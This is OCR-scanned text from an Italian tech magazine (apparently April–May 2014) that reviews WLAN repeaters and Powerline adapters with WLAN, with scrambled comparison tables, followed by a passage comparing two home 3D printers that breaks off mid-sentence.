MI nuovo con il veloce 
NU standard Wireless N. 
A meno di 100 Euro 
potete trovare il velo- 
ce Fritz Box 3272. 


la wlan 


L'intero appartamento 


è servito dalla rete WLAN, 


ma in alcune stanze la 


Contro le interruzioni nel trasferimento 


dati e portata di trasmissione limitata 


trasmissione dati avviene solo 
in modo discontinuo? Spesso un 
ripetitore WLAN può fare miracoli. 


uando i rimedi casalinghi non sono 

sufficienti, sarete costretti a chiamare 

uno specialista anziché il medico di 
base. Potreste, ad esempio, ricorrere ad un 
amplificatore per la rete WLAN, il cosiddetto 
ripetitore. Ne esistono già a partire da 40 Eu- 
ro e rappresentano la soluzione semplice e 
affidabile per ampliare il campo di ricezione 
della rete WLAN. Qui di seguito vi illustriamo 
il funzionamento di un ripetitore e cosa potre- 
te aspettarvi da questo dispositivo. 


RIPETERE CONVIENE 


Il ripetitore può essere inserito in una presa, 
in un punto qualsiasi, tra il router WLAN e il 
modulo ricevitore. Il dispositivo provvederà a 
captare i segnali da e per il router e a ritra- 
smetterli in modo amplificato, creandosi una 
propria rete WLAN. 

Questa nuova WLAN funzionerà da ponte tra 
il router e i dispositivi di ricezione, ad esem- 
pio un notebook, che consentirà una velocità 
di trasferimento dati più elevata, anche su 
grandi distanze. Una rete WLAN in prossimi- 
tà del ripetitore è logicamente più potente ri- 
spetto a quella offerta dal router, la cui effica- 
cia sarà già stata attenuata dalle pareti 
dell'appartamento. 


SEMPLICI IMPOSTAZIONI 


Nel momento in cui il ripetitore si attiva, ogni 
dispositivo si collega automaticamente con 
la rete WLAN più potente a cui può connet- 
tersi. Se il dispositivo si trova vicino al ripeti- 
tore, si collegherà alla rete WLAN di quest'ul- 
timo. 

Spesso, il ripetitore e il router WLAN hanno la 


| VELOCE E SEMPLICE 


Il ripetitore WLAN Fritz 310 (42 Euro) offre una 
portata più ampia, con una spesa limitata. Ba- 
sterà inserirlo nella presa, premere i tasti WPS 
del router e del ripetitore e il gioco è fatto. La 


in tutta la casa. All'occorrenza, il ripetitore, 


a 


stessa password per il dial-up, e utilizzano 
anche lo stesso nome di rete. Ciò significa 
che, per uno Smartphone o un Notebook, 
sarà difficile distinguere se sono loggate alla 
WLAN del router o a quella del ripetitore. 

È però possibile usare anche nomi e pas- 
sword diversi per la rete WLAN. Se un dispo- 
sitivo è loggato ad una delle WLAN, mantie- 
ne comunque anche l’accesso a tutta la rete. 


DOVE DOVREBBE 
ESSERE POSIZIONATO 
UN RIPETITORE? 


Il punto debole di ogni ripetitore dipende dal 
fatto che quest’ultimo, per ricevere i segnali 
del router, necessita di ricorrenti pause per la 
trasmissione, che riducono il flusso dati. Ra- 
gione per cui, quanto meglio sarà posiziona- 
to il ripetitore, tanto meno pesante sarà que- 
sto calo. Come regola generale, il ripetitore 
dovrebbe essere collocato a metà strada tra 
il router e il ricevitore della rete WLAN. In que- 


| velocità è sufficiente per trasferire video in HD 


purché collegato ad un router Fritz Box, potrà 
essere messo in pausa durante la notte. 


sto modo la trasmissione dati, attraverso il ri- 
petitore WLAN, sarà più veloce di quella tra- 
mite il debole collegamento con il router 
WLAN. 


NON SEMPRE 
LA FEDELTA RIPAGA 


Numerosi notebook, Smartphone e Tablet ri- 
mangono fedeli come i cani alla rete WLAN 
alla quale si sono loggati la prima volta. Ne 
consegue che questi dispositivi continuano a 
rimanere ostinatamente legati a questo sca- 
dente collegamento, anche se potrebbero 
usufruire di un collegamento di gran lunga 
migliore, tramite un ripetitore WLAN. Tutto 
questo accade quando al ritorno a casa, col- 
legate per prima cosa il vostro Smartphone al 
potente router WLAN e poi vi spostate in sa- 
lotto, dove il ripetitore è molto più potente. 
Per risolvere questo problema, potete attiva- 
re brevemente la funzione di ricerca per la 
WLAN e cambiare manualmente la rete. 
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uando spesse pareti in cemento ar- 

mato bloccano totalmente il flusso 

dati alla rete WLAN, neppure un ripe- 
titore WLAN può migliorare la situazione: do- 
ve non arriva la WLAN, non è di aiuto nean- 
che una pillola ricostituente. Il rimedio mira- 
coloso per questi problemi potrebbe essere 
la trasmissione dei vostri dati attraverso la li- 
nea elettrica (tecnologia Powerline) di casa 
vostra, incanalandola ulteriormente attraver- 
so la rete WLAN. Abbiamo messo alla prova 
sei adattatori Powerline per la rete WLAN. 


ADATTATORE POWERLINE 
CON WLAN EXTRA 


Il principio di funzionamento della Powerline 
è semplice: l'utente dovrà semplicemente 
provvedere a collegare un adattatore al rou- 
ter, affinché i dati possano essere trasferiti at- 
traverso i cavi elettrici di casa. Potranno es- 
sere posizionati anche altri adattatori nei 
punti dove è richiesto un collegamento con 


GIO 
i 


la rete. Questi dispositivi provvederanno a ri- 
pescare i dati dalla linea elettrica. Fino ad og- 
gi uno svantaggio di questa tecnologia era 
costituito dal fatto che i dispositivi entravano 
in collegamento con la rete solo tramite cavo 
LAN perché in effetti lo standard Powerline 
non prevede una rete wi-fi. 

Con i nuovi adattatori Powerline per WLAN, 
la situazione cambia, poiché essi si creano 
una propria rete. In tal modo è quindi possibi- 
le, collegare Smartphone, Notebook o Ta- 
blet, che non dispongono di una porta di 
connessione per la LAN. Si collegano al rou- 
ter e a Internet, attraverso l'adattatore WLAN 
e la linea elettrica e, inoltre, anche agli altri di- 
spositivi della LAN domestica, come una 
stampante o un hard disk virtuale online. 


RIPETITORE 0 ADATTATORE 
POWERLINE? 


Gli adattatori con funzione WLAN, con prezzi 
da 70 a 140 Euro, sono più costosi di un ripe- 


titore (a partire da 40 Euro). Il costo ecceden- 
te ricompensa però gli utenti, la cui rete ha 
smesso di funzionare in alcune stanze a cau- 
sa della presenza di ostacoli o in apparta- 
menti o abitazioni molte ampie. | kit adattato- 
ri offrono anche un altro vantaggio rispetto ai 
ripetitori WLAN, la cui velocità di trasferimen- 
to dati dipende fortemente dal punto in cui 
sono stati posizionati. Quanto più lontani sa- 
ranno collocati dal router, tanto più bassa sa- 
rà la velocità. Ogni ripetitore tende inoltre a 
dimezzare la velocità di trasferimento dei da- 
ti, dovendo alternativamente ricevere e tra- 
smettere dati. 

L'adattatore combi Powerline non necessita 
invece di alcuna pausa ed è in grado di tra- 
smettere sempre a piena velocità. L'adatta- 
tore dotato della funzione WLAN diffonde le 
onde radio sempre alla massima potenza, 
nell'ambiente dove sarà stato precedente- 
mente inserito in una presa: la soluzione ide- 
ale per le stanze molto distanti dal router. 


COME FUNZIONA LA RETE WLAN TRAMITE POWERLINE 


Sulla confezione del dispositivo viene pub- 
blicizzata una velocità di trasferimento dati 


L'anello più lento 


pari a 500 Mbps! In realtà, la velocità è molto 
più bassa: nel corso del test, i dati sono stati 
trasferiti attraverso la linea elettrica solo alla 
velocità di 35 Mbps. L'ostacolo è rappresenta- 
to dalla linea elettrica e, non come ci si aspet- 
terebbe, dalla funzione WLAN dell'adattatore. 
Non è quindi di alcuna utilità che l'adattatore 
sia in grado di trasferire i dati a 95 Mbps. 


e0ee 
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della catena 
Adattatore determina la 
Adattatore Powerline con Velocità generale 
Powerline funzione WLAN del trasferimento 
di dati. Malgrado 
pin NE È la presenza di una 
Router f- «E Lince ciettrica (E Alf WLAN più veloce, la 
Ù Hi velocità rimane di 
L'adattatore i _soli 35 Mbps, che 
trasferisce ReITa è però ampiamente 
i dati attraverso ; sufficiente per tutti 
la linea elettri- 1) i trasferimenti 
ca solo alla ve- î eseguibili con 
locità di circa , semplici 
35 Mbps. connessioni DSL 
con velocità fino 
a 25 Mbps. 


DATI IN GRAN QUANTITÀ 


La velocità di trasferimento dati (500 mega- 
bit al secondo) riportata sulla confezione di 
tutti gli adattatori Powerline, non corrispon- 
de al vero. Anziché trasferire attraverso la li- 
nea elettrica 500 Mbps, nel migliore dei casi 
saranno tutt'al più 70 Mbps. All’interno 
dell’edificio scelto per le prove - una caset- 
ta unifamiliare - neppure il vincitore del test 
AVM Fritz Powerline 546E ha offerto una 
velocità superiore a 35 Mbps. A seconda 
del cablaggio della casa, la velocità di tra- 
sferimento può risultare più elevata o più 
bassa. 

La velocità di trasferimento dati via WLAN è 
stata invece di 95 Mbps, che sembra esse- 
re un valore eccezionale anche se, per sta- 
bilire la velocità totale, è decisiva la trasmis- 
sione dei dati attraverso la linea elettrica. Se 
i dati pervengono dall’adattatore Powerline 
solo a 35 Mbps, quest’ultimo li trasmetterà 
a questa velocità anche attraverso la WLAN 
- l'anello più lento della catena determina la 
velocità totale. 

La velocità di 35 Mbps può apparire delu- 
dente, ma anche per le più veloci connes- 


H a 


sioni DSL non è richiesta una velocità di tra- 
sferimento più elevata. Questa velocità è 
ampiamente sufficiente per il trasferimento 
di video in HD tramite la rete e per navigare. 
35 Mbps sono inoltre la velocità ottimale 
per trasferire i dati in stanze molto distanti. 


COME FUNZIONA 
L'INSTALLAZIONE? 

Per ogni abitazione sono necessari almeno 
due adattatori. L'adattatore semplice Power- 
line viene posizionato sul router, mentre il 
modello con funzione di WLAN può essere 
collocato in ogni punto, dove è richiesta una 
buona rete WLAN. 

Grazie ad una password standard preimpo- 
stata, gli adattatori stabiliscono immediata- 
mente il collegamento criptato attraverso la 
linea elettrica. 

Dovrete modificare questa password per tut- 
ti gli adattatori, solo se utilizzerete prese di 
corrente esterne, che non potete disattivare, 
come, ad esempio, in una terrazza. In caso 
contrario, gli utenti non autorizzati potranno 
connettersi alla vostra LAN di casa, sempli- 
cemente inserendo un adattatore Powerline. 
Molto apprezzabile il fatto che tutti i dispositi- 
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vi candidati del test vengono forniti dal pro- 
duttore già criptati. La chiave WLAN indi- 
spensabile è stampata direttamente 
sull’'adattatore. 

Subito dopo avere installato il kit, potrete uti 
lizzare la rete WLAN, come di consueto. | vo- 
stri dispositivi si connetteranno con la rete 
WLAN più potente, che voi riuscirete a rice- 
vere, sia che derivi dal router o dal gruppo 
adattatore. Tutte le tecniche potranno del re- 
sto anche essere combinate (vedi box in 
basso) e potrete quindi installare un ripetitore 
a pianterreno e un adattatore Powerline 
WLAN sotto il tetto. 


CONCLUSIONI 

Il kit adattatori combo di AVM Fritz Powerline 
546E (con funzione WLAN) e il modello 520E 
(senza funzione WLAN) hanno offerto i risul- 
tati migliori. Tramite questo set è possibile 
creare in ogni stanza, dove sia presente una 
presa, una rete WLAN con una potenza suffi- 
ciente per trasferire anche video in HD. Vinci- 
tore del rapporto qualità/prezzo è stato il kit 
TP-Link TL-WPA-4220KIT, con un prezzo di- 
mezzato rispetto al vincitore del test, ma an- 
che più lento nella trasmissione dei dati. 


RIMESSA IN SESTO: ECCO LA NOSTRA RETE WLAN DOPO LA CURA 


Chi è veramente malato, è spesso costretto a prendere decine di 
pittole: A seconda della conformazione dell'appartamento e del 
tipo‘di disturbi, anche il “medico” per la WLAN, in caso di con- 
gestione di dati, dovrà talvolta consigliare come cura la combi- 
nazione di più rimedi, così come raffigurato nell'appartamento 
qui.in basso. In tre punti dell'appartamento sono state rilevate 


ROUTER 


La cura basata sul cambio di canale 
ha eliminato i disturbi alla rete 
WLAN causati dal vicino di casa. Ri- 
sultato: la rete WLAN vicina al router 
è il metodo più veloce per accedere 
alla rete (blu). | trasferimenti di dati 
sono stati più lenti tramite il ripeti- 
tore (rosso) e l'adattatore Powerline 
con funzione WLAN (verde). 


100 Mbps 


Rete WLAN 


ANNA 11111// 


| ‘Ripetitore WLAN 


Powerline con funzione WLAN 


nf 
ee 


le velocità di trasferimento dati della rete WLAN del router (blu), 
della funzione WLAN ottenibile tramite un ripetitore {rosso} e ta 
velocità raggiungibile con un adattatore Powerline. Itrouter non 
necessita di cure, l'impiego di un ripetitore in:salotto può miglio- 
rare la qualità della rete WLAN, mentre nello studio dovrebbe 
essere installato un dispositivo Powerline. 


SALOTTO 

La cura con il ripetitore ha reso possi- 
bile un tale aumento di velocità, da 
non bloccare il trasferimento di video 
attraverso la rete (rosso). Tutto questo 
ad un costo limitato. 


IA 36 Mbps 
48 Mbps 
IA 33 Mbps 


STUDIO 


Dove il router arriva con poca poten- 
za (blu) e anche il ripetitore offre 
una ricezione debole (rosso), l'adat- 
tatore Powerline con funzione WLAN 
è in grado di gestire velocemente il 
flusso dati (verde). 


i 15 Mbps 
25 Mbps 


IA 33 Mbps 


AprileMaggio 2014 


eees 
cecè 


0541 


AVM FRITZ DEVOLO 


POWERLINE 546E DLAN 500AV WIRELESS+ 
Prezzo: 110 Euro Prezzo: 141 Euro 


NESSUNO E PIU VELOCE UNICA WLAN A 5 GIGAHERTZ 

Il dispositivo AVM è stato in grado di trasferi- Il dLAN 500AV ha consentito di trasferire abba 
redati più velocemente di tutti, sia su linea stanza velocemente pacchetti di dati attraverso 
elettrica che WLAN. intervenendo sui canali la finea elettrica e anche tramite la rete WLAN, il 
della WLAN, è stato possibile aumentare ul- trasferimento è stato rapido. Devolo è stato 
teriormente la velocità. Ha ricevuto un punto l'unico candidato del test a offrire una WLAN 

a favore, per il comando in remoto della pre- |... anche da 5 GHz, ma la portata della rete non è 
sa elettrica ripetuta sull'adattatore e per Ja Stata il massimo. Punto debole: l'elevato consu- 
funzione di misurazione che offre. mo energetico per la trasmissione dei dati, 


| RISULTATI IN BREVE fon 0 start Lo starter kit è costituito da un connettore Powerline e 


unadattatore WLAN. 


Tramite l'adattatore WLAN dLAN 500WiF (67 Euro) è 


50 S possibile potenziare la rete. 
ite l'adattatore WLAN di AVM Fritz Powerline 


(92 Euro) è possibile potenziare la rete. 
Con quale velocità aviene i tresferimento dei dati? Veloce e comuna risen di potenza per video in HD. n 


Il dispositivo crea disturbi o ne riceve? Reti WLAN di altri utenti possono rallentare sensibilmen- Reti WLAN di altri utenti possono rallentare sensibilmen- 


te il trasferimento di dati. te il trasferimento di dati. 
Con quale grado di sicurezza awiene il trasferimento di dati? Sicurissimo, poiché il collegamento è criptato. Sicurissimo, poiché il collegamento è criptato. 
cop - n 
Quanto è velica a Gotazione del'adatiaioe’ Buona, anche se manca un indicatore per la velocità. Dotazione ricca, ma il consumo energetico è elevato. 
Quanto è facile da usare l'adattatore? Buono, anche se le istruzioni sono scarse. Molto semplice, ma le istruzioni sono scadenti, 
Bonus / Malus Comando remoto, misurazione consumo nessuno 


Velocità trasferimento dati via WLAN n 2,4 GHz: attraverso 0 / 1 /2/3/4 / pareti (Mbps) 93/92/68 / 54 / 18 95/85 /41/33/18 
Velocità trasferimento dati via Wireless N 5 GHz attraverso 0 / 1/2/3/4 / pareti (Mbps) nicht moglich 95/78/18/4/- 
Velocità trasferimento dati con adattatore Powerline posizionato alla distanza di: 9 m / 9 m (con interferenze / 325/307 / 247 /27,1/184 352/948/263/274/131 


17m/22m/41m(con contatore) - lunghezza cavo 


QUANTO È SENSIBILE ALLE INTERFERENZE IL TRASFERIMENTO DATI? 


Trasferimento dati sensibile alle interferenze no no 
ni del 42 percento / del 21 percento del 43 percento / del 4 percento 
Il dispositivo esclude le interferenze: all'attivazione della WLAN / ne cambio WLAN durante l'utilizzo si / no si/no 
Attenuazione velocità di trasferimento con filtro per rete elettrica (filtro per onde radio) 0,4 percento 7,54 percento 
Powerine: radiazioni a 3 mt di distanza a norma, conforme alla norma sui disturbi NB30 a norma, conforme alla norma sulle interferenze NB30 
Interferenze radio elevata elevata 
Criptazione già inserita dal produttore si si 
Possibilità di aggiungere altri adattatori Powerline molto semplice molto semplice 
Sicurezza elettrica A norma a norma 
Numero delle porte Ethernet 2 3 
Altre porte di connessione nessuna nessuna 
Velocità della connessione Ethemet 100 Megabit/sec. 100 Megabit/sec. 
Indicatore della qualità del collegamento no presente 
Presa by passante da 230 Volt si, programmabile con il misuratore di potenza si 
Possibilità di acquistare singolarmente altri adattatori WLAN si si 
Consumo energici sona colegamento tiv / senza trasisimento di dati / Costo annuo 4,1 Watt / 6,8 Watt /8,3Watt / 6,12 Euro 5,4Wett / 8,5Watt /12,1Wett /‘8 Euro 
{Consumo in stand-by) 
Istruzioni d'uso cartacee di facile comprensione, ma scarse brevi istruzioni con illustrazioni 
Messa in servizio semplice molto semplice 
Componenti necessari inclusi nella confezione: cavo di rete / software 1 x cavo LAN, istruzioni / no 1 x cavo LAN, brevi istruzioni d'uso / si, CD 
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TP-LINK 


TL-WPA4220KIT 
Prezzo: 87 Euro 


ALTERNATIVA ECONOMICA 


I due moduli che compongono il set di TP- 
Link sono diversi nell'aspetto: il design 
della base Powerline e dell'adattatore 
WLAN è completamente differente. La 
funzione WLAN è veloce, il trasferimento 
dei dati a mezzo Powerline avviene in mo- 
do corretto; ma ad una velocità più lenta 

1 di30 Mbps. 


Lo starter kit è costituito da un connettore Powerline e 
un adattatore WLAN. 
Tramite l'adattatore WLAN TLWPA4220 Extender Adap- 


ter (51 Euro) è possibile potenziare la rete. 


La WLAN è veloce e la Powerline funziona 
discretamente. 

Le reti WLAN funzionanti sullo stesso canale rallentano 

il trasferimento dati. 
Sicurissimo, poichè il collegamento è criptato. 
Mancano un indicatore per la velocità e la presa 

by-passante. 

Semplice, istruzioni in lingua inglese. 


KATA 


HP-5101WN 
Prezzo: 52 Euro 


ADATTATORE 
CON “ORECCHIE” 


l'adattatore per la funzione WLAN di Edi- 
max è dotato di antenne, ma la velocità 


| della WLAN non è migliore di quella degli 


altri concorrenti. Se camminando su un 
tappeto toccate l'adattatore, la trasmis- 
sione dei dati può essere disturbata da 
scariche elettriche. 


Non è in commercio uno starter kit e quindi è necessa 


rio disporre di un adattatore Powerline, come ad esem- i 
|. Tramite l'adattatore WLAN XWN 5001 (55 Euro), è pos- 


pio l'HP-5101AC {27 Euro, gia compreso nel prezzo s0- 
praindicato del dispositivo). Tramite l'adattatore WLAN 
HP-5101Wn (40 Euro) è possibile potenziare la rete. 


La WLAN è ok, mentre invece la Powerline è un po' 
scadente. 

Scariche di elettricità statica sull'involucro disturbano 

la trasmissione di dati. 
Sicurissimo, il collegamento è criptato. 
L'adattatore WLAN non dispone di presa elettrica 
by-passante. 

Molto semplice, con istruzioni in lingua inglese. 

nessuno 
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NETGEAR 
XWNB 5602 
Prezzo: 104 Euro 


WLAN DEBOLE 

Il set di Netgear è in grado di trasferire veloce- 
mente dati via WLAN, se al massimo deve su- 
perare tre pareti. Sa il numero di queste ulti- 
me aumenta, la velocità cala sensibilmente. 
Tramite l'adattatore Powerline, la velocità è 
ok. Come difetto è stato riscontrato, che la 
notevole iarghezza dell'adattatore WLAN può 
bloccare più prese. 


Lo starter kit è costituito da un connettore Powerfine e 
un adattatore WLAN. 


sibile potenziare la rete. 


La WLAN è ok, mentre invece la Powerline è un po' 
scadente. 
Le reti WLAN di altri utenti rallentano la velocità di 
trasmissione. 

Sicurissimo, il collegamento è criptato. 
L'adattatore WLAN ron dispone di presa elettrica 
by-passante. 

Semplicissima, istruzioni d'uso un po' scarse. 
nessuno 


KAAAK 
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LINKSYS 
PLWK 400 
Prezzo: 94 Euro 


SOLO IN COPPIA 

Anche dovendo attraversare tre pareti, la ve 
locità della funzione WLAN del Linksys rima- 
ne dignitosa - attraverso la linea elettrica, il 
trasferimento avviene però a velocità molto 
bassa. Alla data di esecuzione del test, non è 
stato possibile acquistare ulteriori adattatori 
WLAN. Per ampliare il sistema è necessario 
ricomere ad adattatori di altri produttori 


Lo starter Kit è costituito da un connettore Powerline e 
Lin adattatore WLAN. 


| Tramite l’adattatore WLAN PLW-400 è possibile poten: 


ziare la rete. 


La WLAN è veloce, ma non è così per la Powerline. 


| filtrî per la rete elettrica fanno calare la velocità. 
Sicurissimo, il collegamento è criptato. 
L'adattatore è dotato solo dei componenti necessari. 
Semplicissima, con istruzioni in lingua inglese. 


KAAA 


" 87/85/59/41/13- 
non possibile 
198/198/177/179/92 


del 53 percento / del 41 percento 


si/no 
2,35 percento 
a norma, conforme alla norma sulle interferenzei 
NB30 


. SEINIOITO, 
non possibile 
218/21/ 149/123 su simo ie 


causa A ei sata sulla c carcassa 


del 25 percento / del 53 percento 
si/no 
4,76 percento 
a norma, conforme alla norma sulle interferenze NB30 


SE TTEIETT 
non possibile 
21 /199/167/168/23 


dal 54 percento / del 31 percento 


si/no 
14,03 percento 
a norma, conforme alla norma sulle interferenze NB30 


STE a 


sua ca 
(ATENEA TA RESS) n° 


89 /88/ 52/50/14 
non possibile 
17,2/17,2/15,1/16/4,1 


del 39 percento / del 59 percento 
sî/no 
10,96 percento 


a norma, conforme alla norma sulle interferenze NB30 


nessuna 
100 Megabit/sec. 
no 
no 
si 


4, Watt / 5,8 Watt /7,0 Watt / 6,50 Euro 


solo i fganingiese. 
semplice 
2x cavi LAN, brevi istruzioni d'uso / si, CD 


100 Megabit/sec. 
disponibile 
non sull'adattatore WLAN 
si 


4,1 Watt / 5,6 Watt /6,9 Watt / 6,11 Euro 
VS e 
solo in lingua inglese 
molto semplice 
2x cavi LAN, brevi istruzioni per l'uso / si, CD 


100 Megabit/sec. 
disponibile 
non sull'adattatore WLAN 
si 
3,6 Watt /5,9 Watt /8,8 Watt / 5,41 Euro 


LR ME EEZADE GE ba 
di facile comprensione, ma un po' scarse 
molto semplice 


2 cavi LAN, brevi istruzioni per l'uso / si, CD 


Sri: 


IE VESTA 3 


nessuna 
100 Megabit/sec 
manca 
no 
no 


5,2 Watt / 5,8 Watt /7,8 Watt / 7,69 Euro 


solo in lingua inglese 
molto semplice 
2.x cavi LAN, brevi istruzioni per l'uso / si, CD 
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Stampe 3D fatte 


In casa 


Abbiamo messo a confronto nei nostri laboratori due stampanti 3D: 
una di tipoeconomico e una costosa. Saranno all'altezza di offrire 


stampe di qualità? 


n test sul campo di due modelliarrivati di recente 

nei nostri laboratori, uno abbastanza economico 

e unodal prezzo più impegnativo. | modelli inque- 
stione, che già si possono trovaresugli scaffali dei riven- 
ditori, sono la Free-Sculpt 3D di Pearl, in vendita all’in- 
credibileprezzo di 800 euro (per una stampante 3D) e la 
Ultimaker a 2080 euro. Linux Magazine ha voluto quindi 
accertarsi se conviene già prendere in esame l'acquisto 
o se è meglio attendere l’uscita dei dispositivi di prossi- 
ma generazione. 


LA PRIMA IMPRESSIONE 


La stampante 3D di Pearl si presenta subito come un 
“incrocio” tra un frigo portatile e un forno da bambini. 
La rivale Ultimaker vanta invece una parziale struttura 
in legno compensato, che, derivando da rami d’albero 
lavorati, può richiamare la natura. Per gli amanti del fai- 
da-te esiste addirittura un kit per costruirsela, con un 
risparmio di circa 600 euro. 
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UNBOXING: FACILE E MENO FACILE 


Per quanto riguarda la struttura e la facilità d'uso, il model- 
lo sorprendentemente economico di Pearl gode di un leg- 
gero vantaggio rispetto a Ultimaker: basterà infatti estrar- 
re la stampante dall’imballo, infilare la spina nella presa e 
avviare il dispositivo. 

Il materiale per la stampa è già installato e la scheda SD in 
dotazione contiene già alcuni oggetti da scegliere, che po- 
tranno essere creati immediatamente. Ultimaker richiede 
invece una maggior esperienza tecnica. 

Anche se il dispositivo si presenta già assemblato, alcuni 
componenti necessitano di essere fissati al case e biso- 
gna procedere all’installazione del materiale di consumo 
da utilizzare per la stampa. Le indispensabili istruzioni non 
sono in dotazione ed è possibile recuperarle solo con un 
intensa ricerca online. Una volta superato questo ostaco- 
lo, l'utilizzo si rivela semplice come quello del dispositivo 
di Pearl. 


Le due stampanti 3D prese in esame nel nostro test: la Pearl 
FreeSculpt EX1- Basic e la Ultimaking Ultimaker. 


dai .wbca% "i.e 


CREAZIONI “FAI DA TE” 2.0 


Ll’utilizzo casalingo delle stampanti 3D ci permette di realizzare, anche con poca 


spesa, una moltitudine di oggetti. 


PEZZI DI RICAMBIO 

La copertura del tele- 
comando si è rotta? Gli 
ingranaggi dell'orologio 
a cù-cù si sono spezzati? 
Basterà semplicemente 
stamparne di nuovi, con- 
sentendo ai consumatori 
di passare al ruolo di 
produttori. 


COSTUMI E MASCHERE 
Sono tante le idee 
proposte da siti come 
Thingiverse e simili: il 
costume di Guy Fawkes 
(presente nel film “V 
per Vendetta”), zucche 
per Halloween, ma- 
schere poligonali di 
ogni tipo... 


GIOCATTOLI 

La copertura del telecomando si è rotta? Gli ingranaggi 
dell'orologio a cù-cù si sono spezzati? Basterà semplice- 
mente stamparne di nuovi, consentendo ai consumatori di 
passare al ruolo di produttori. 


MATERIALE, COSTI E DURATA 


Entrambe le stampanti utilizzano dei rocchetti di filo di mate- 
riale plastico, di diverso colore, da posizionare sul retro dei 
dispositivi. Entrambi i modelli lavorano con la tecnica della 
stratificazione per fusione, che provvede a riscaldare il lavora 
materiale plastico e a depositarlo su un piatto attraverso un 
ugello mobile. L'oggetto viene quindi creato dal basso verso 
l'alto in strati estremamente sottili, come le fondamenta di 
una casa. Il costo del materiale e di esercizio è estremamen- 
te basso: la stampa di oggetti di piccole dimensioni costa, 
di regola, solo qualche centesimo di euro. Il procedimento 
richiede però una certa pazienza: per un oggetto grande 
quanto un dito pollice, la stampante, a seconda della qualità 


OGGETTI UTILI 

Una nuova custodia per 

il cellulareo una nuova 
montatura per gliocchiali? 
La stampa in 3D nondeve 
essere considerata soloco- 
me un divertimento, perché 
infuturo sarà al nostro 
fianco nellavita pratica di 
tutti i giorni. 


OGGETTI DI DESIGN 

Sia che si tratti di 
una vostra creazio- 
ne o di una semplice 
idea scaricata da 
Internet, avrete la 
possibilità di stam- 
parvi i vostri oggetti 
di design: cornici 
per fotografie, vasi 
o decorazioni, senza 
alcun limite. 


PERSONAGGI VIRTUALI 
Action figure pre- 
seda videogame, 
film,cartoni ani- 
mati...si possono 
trovarein Rete e 
stamparefacilmen- 
tepersonaggi difan- 
tasia (e non)senza 
alcunproblema. 


desiderata, necessita di quasi due ore. 


LA SALUTE PRIMA DI TUTTO 


Entrambe le candidate al test iniziano finalmente il loro lavo- 
ro, ma una di queste ci fa arricciare il naso. Il dispositivo di 
Pearl, con il suo case compatto, tutto di plastica, sprigiona 
infatti un penetrante odore di sostanze chimiche. Non ap- 
pena il materiale per la stampa a base di petrolio si scalda, 
l'olfatto percepisce l’odore violentemente. Anche i rumori 
provocati dal processo di stampa sono sgradevoli e sem- 
brano quelli intensi di un vecchissimo modem a 56k. La co- 
stosa Ultimaker si rivela invece tutta un'altra cosa. Il case si 
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SIAMO PRONTI A STAMPARE IN 3D? 


Passo dopo passo e strato dopo strato, fino ad arrivare all’oggetto finito, tutto partendo 
da una semplice idea. Vediamo tutte le fasi della creazione di una stampa 3D 


mi 


Motaor 


CI SERVE IL TOOL GIUSTO 
Carichiamo nel programma Maker- 
ware il modello 3D da realizzare, in 

modo che vengano generati dei Gcode 

(insieme dei dati in linguaggio macchina). 


LA FORMA PRENDE VITA 
Inizia la procedura di deposito mate- 
riale (estrusione), che permette di so- 
vrapporre progressivamente i vari strati 
del modello. 


presenta come una struttura aperta, di aspetto curato, dalla 
quale non si sprigionano odori sgradevoli, neppure durante il 
processo di stampa. Tutto questo dipende dal case in legno 
compensato e dal materiale utilizzato per la stampa:plastica 
in acido polilattico biodegradabile. La sua rumorosità duran- 
te la lavorazione ricorda una vecchia stampante a getto d’in- 
chiostro. L'Ultimaker si è rivelata migliore anche nel distacco 
dell’oggetto finito dal piatto di stampa: il piatto viene dappri- 
ma rivestito con un nastroadesivo, che consente all'oggetto 
finito di staccarsi più agevolmente. Nella stampante di Pearl, 
l'oggetto rimane attaccato saldamente al piatto ed è neces- 
saria una spatola per staccarlo. 


SOFTWARE E DESIGN PERSONALIZZATO 


Dopo aver stampato i modelli in dotazione, i tecnici di Linux 
Magazine hanno utilizzato anche modelli scaricabili da Inter- 
net. Su pagine Web comeThingiverse (http://www. thingiver- 
se.com/), è possibile infatti trovare eleganti oggetti di design 
di ogni tipo, realizzate da tanti utenti. Con un semplice clic 
può essere scaricato in un attimo il file gratuito del progetto, 
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CONTROLLI PRIMA DEL VIA 
Sul display della Replicator pos- 
siamo visualizzare le informazioni 
che la SD Card integrata nella stam- 
pante riceve dal software Makerware. 


LA TEMPERATURA SALE ANCORA 
Mentre si deposita il materiale, il 
piatto tende ad abbassarsi. In que- 
sta fase le temperature possono rag- 
giungere anche i 230°. 


; "E 


IL PROCESSO PUÒ INIZIARE 
Una volta avviata la procedura, il 
piatto della stampante 3D si co- 
mincia a riscaldare (arriva almeno 
fino alla temperatura di 100/1109). 


L'OGGETTO È REALIZZATO! 
Al termine della stampa (il tempo 
varia in base alla complessità del 

modello da creare), il nostro oggetto 

3D sarà pronto da usare! 


per stampare l'oggetto desiderato che si vuole creare. Per 
prima cosa gli oggetti devono essere convertiti nel formato 
idoneo per la relativa stampante (sia Pearl che Ultimaker for- 
niscono il loro software specifico). Pearl offre il programma in 
dotazione con la stampante, mentre quello di Ultimaker deve 
essere scaricato da Internet. 

La loro applicazione non è semplice, perché purtroppo 
entrambi i programmi sono solo in lingua inglese. Il sof- 
tware di Pearl differisce da quanto scritto circa la conver- 
sione dell’oggetto.Il programma non può essere conside- 
rato user-friendly, poiché, senza nozioni di base, nessuno 
riuscirà a stampare il suo oggetto. Il software di Ultima- 
ker si presenta al contrario abbastanza semplice e persi- 
no la qualità di stampa può essere impostata su tre livelli. 
È possibile quindi scegliere se la priorità deve essere la 
rapidità o la qualità di stampa. Dopo alcuni giorni i no- 
stri tester hanno familiarizzato a tal punto con i dispositivi 
da potere entrare di diritto nel mondo della magnifica arte 
della stampa in 3D: fare la scansione degli oggetti e stam- 
parli. Pearl offre anche una variante della stampante, che 
include già uno scanner 3D. Affinché il test fosse imparzia- 


le ed entrambe le candidate potessero godere delle stesse 
condizioni di base, la scansione è stata eseguita con una 
videocamera Kinect. 


MODELLI GRATIS? CI PENSA IL WEB! 


Il grande interesse per le stampe 3D si può intuire anche os- 
servando la crescente disponibilità (e varietà) di modelli e 
servizi offerti dal Web. Numerosissimi sono infatti i siti che 
offrono veri e propri archivi di modelli 3D pronti da stampa- 
re. Pensando di fare un servizio utile, elenchiamo perciò di 
seguito una serie di siti dai quali è possibile scaricare mo- 
delli 3D, gratuiti e non. Oltre a Thingiverse, già citato nel pa- 
ragrafo precedente, ci sono ShapeWays (www.ShapeWays. 
